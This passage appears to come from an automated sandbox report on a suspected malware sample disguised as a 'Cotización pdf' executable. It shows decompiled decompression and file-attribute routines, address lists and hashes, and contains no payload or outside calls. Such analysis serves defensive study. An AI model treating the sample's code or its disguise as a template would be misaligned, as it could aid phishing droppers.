											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406355
0x00406355
0x00406359
0x00406382
0x0040638c
0x0040635b
0x00406364
0x00406371
0x00406374
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x004066b8
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x0040673a
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004066bb
0x004066b8

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040575C, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040575C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405760
0x0040576d
0x00405782
0x00405788

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe,80000000,00000003), ref: 00405760
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0040573D, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040573D(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}

0x00405741
0x0040574a
0x00000000
0x00405753
0x00405759

APIs

GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
